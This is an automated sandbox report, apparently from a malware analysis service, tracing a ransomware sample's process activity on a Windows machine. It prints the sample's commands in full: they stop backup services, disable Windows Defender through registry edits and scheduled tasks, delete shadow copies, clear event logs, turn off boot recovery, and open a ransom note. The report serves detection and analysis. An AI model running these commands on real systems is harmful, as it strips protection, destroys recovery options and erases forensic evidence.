06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 37 PID 1464 wrote to memory of 1412 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 37 PID 1464 wrote to memory of 1412 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 37 PID 1412 wrote to memory of 1988 1412 net.exe 39 PID 1412 wrote to memory of 1988 1412 net.exe 39 PID 1412 wrote to memory of 1988 1412 net.exe 39 PID 1464 wrote to memory of 1744 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 40 PID 1464 wrote to memory of 1744 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 40 PID 1464 wrote to memory of 1744 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 40 PID 1744 wrote to memory of 1960 1744 net.exe 42 PID 1744 wrote to memory of 1960 1744 net.exe 42 PID 1744 wrote to memory of 1960 1744 net.exe 42 PID 1464 wrote to memory of 1096 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 43 PID 1464 wrote to memory of 1096 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 43 PID 1464 wrote to memory of 1096 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 43 PID 1096 wrote to memory of 1460 1096 net.exe 45 PID 1096 wrote to memory of 1460 1096 net.exe 45 PID 1096 wrote to memory of 1460 1096 net.exe 45 PID 1464 wrote to memory of 956 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 46 PID 1464 wrote to memory of 956 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 46 PID 1464 wrote to memory of 956 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 46 PID 956 wrote to memory of 744 956 net.exe 48 PID 956 wrote to memory of 744 956 net.exe 48 PID 956 wrote to memory of 744 956 net.exe 48 PID 1464 wrote to memory of 1040 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 49 PID 1464 wrote to memory of 1040 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 49 PID 1464 wrote to memory of 1040 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 49 PID 1040 wrote to memory of 1496 1040 net.exe 51 PID 1040 wrote to memory of 1496 1040 net.exe 51 PID 1040 wrote to memory of 1496 1040 net.exe 51 PID 1464 wrote to memory of 1872 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 52 PID 1464 wrote to memory of 1872 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 52 PID 1464 wrote to memory of 1872 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 52 PID 1464 wrote to memory of 1588 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 54 PID 1464 wrote to memory of 1588 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 54 PID 1464 wrote to memory of 1588 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 54 PID 1464 wrote to memory of 1540 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 56 PID 1464 wrote to memory of 1540 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 56 PID 1464 wrote to memory of 1540 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 56 PID 1464 wrote to memory of 860 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 58 PID 1464 wrote to memory of 860 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 58 PID 1464 wrote to memory of 860 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 58 PID 1464 wrote to memory of 1948 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 60 PID 1464 wrote to memory of 1948 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 60 PID 1464 wrote to memory of 1948 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 60 PID 1464 wrote to memory of 1728 1464 06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe 62
Processes
-
C:\Users\Admin\AppData\Local\Temp\06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe"C:\Users\Admin\AppData\Local\Temp\06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:996
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1628
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:820
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1988
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1960
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1460
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:744
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1496
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1872
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1588
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1540
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:860
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1948
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1728
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1068
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:544
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1188
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2004
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1076
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1952
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1484
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1592
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1688
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:996
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1628
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:820
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1988
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1960
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1460
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:744
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1496
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1900
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1108
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1836
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1944
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1916
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1228
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:916
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1716
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1448
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1552
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1984
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:240
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:984
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1772
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1816
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1996
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1376
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1184
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1732
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2092
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2112
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2132
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2152
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2164
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2184
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2272
-
-
-
C:\Windows\system32\notepad.exenotepad.exe C:\mSnL_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2620
-
-
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe"2⤵PID:2628
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2652
-
-